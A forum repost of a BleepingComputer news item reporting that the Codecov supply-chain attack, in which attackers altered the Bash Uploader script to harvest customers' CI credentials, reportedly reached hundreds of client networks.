silversurfer
Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
- Aug 17, 2014
- 10,057
More details have emerged on the recent Codecov system breach which is now being likened to the SolarWinds hack.
In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems.
As reported by BleepingComputer last week, Codecov had suffered a supply-chain attack that went undetected for over 2-months.
In this attack, threat actors had gained Codecov's credentials from their flawed Docker image that the actors then used to alter Codecov's Bash Uploader script, used by the company's clients.
By replacing Codecov's IP address with their own in the Bash Uploader script, the attackers paved a way to silently collect Codecov customers' credentials—tokens, API keys, and anything stored as environment variables in the customers' continuous integration (CI) environments.
According to federal investigators, Codecov attackers deployed automation to use the collected customer credentials to tap into hundreds of client networks, thereby expanding the scope of this system breach beyond just Codecov's systems.
"The hackers put extra effort into using Codecov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM," a federal investigator anonymously told Reuters.
By abusing the customer credentials collected via the Bash Uploader script, hackers could potentially gain credentials for thousands of other restricted systems, according to the investigator.
Hundreds of networks reportedly hacked in Codecov supply-chain attack
More details have emerged on the recent Codecov system breach which is being likened to the SolarWinds hack. In new reporting, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems.
www.bleepingcomputer.com